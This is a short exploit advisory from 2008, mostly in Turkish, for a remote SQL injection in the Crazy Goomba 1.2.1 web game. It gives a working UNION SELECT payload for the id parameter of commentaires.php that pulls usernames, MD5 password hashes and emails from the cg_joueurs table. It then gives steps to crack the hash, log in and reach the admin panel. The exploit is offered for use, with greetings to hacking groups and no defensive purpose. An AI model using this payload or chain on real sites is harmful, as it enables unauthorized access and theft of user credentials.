Crazy Goomba 1.2.1 (id) Remote SQL Injection Vulnerability

2008-04-21 00:00:00

##########CANAKKALE GECiLMEZ##############################

Crazy Goomba 1.2.1 SQL inj

dork: :(( sory

author: ZoRLu

home: ( http://www.z0rlu.ownspace.org ) ( yildirimordulari.org ) ( r00tsecurity.org ) ( securityfocus.com )

contact: [email protected] & [email protected] ( baska msn yok taklitlerden kacInIn )

Not: msn i ekleyipte densiz densiz konusanIn sulalesini cumle alem .... La benden keylog isyetesiniz diye vermiyorum msn i. sacmalamayIn da :((

Not: http://www.z0rlu.ownspace.org acIklarýn kullanImI ile ilgili bilgiler blogumda mevcut! naparsIn para yokk free actIk :))

###################CANAKKALE GECiLMEZ###################

http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]


[SQL]


1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**



( [SQL] yazan yere kodu yaz admin name, password(md5) ve email adresine ulas )

md5 i kýr ve giris yap

http://localhost/Crazy_Goomba_1.2.1_path/index.php?page=connexion ( login )


sonra admin panele baglan


admin panel:


http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php



###################CANAKKALE GECiLMEZ####################

thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK, kasIrga(lavrens), w3R3m

avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :)) )

Efsane: YILDIRIMORDULARI.ORG

Dersler BasladI Sanal Bitti :(((

###################CANAKKALE GECiLMEZ####################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.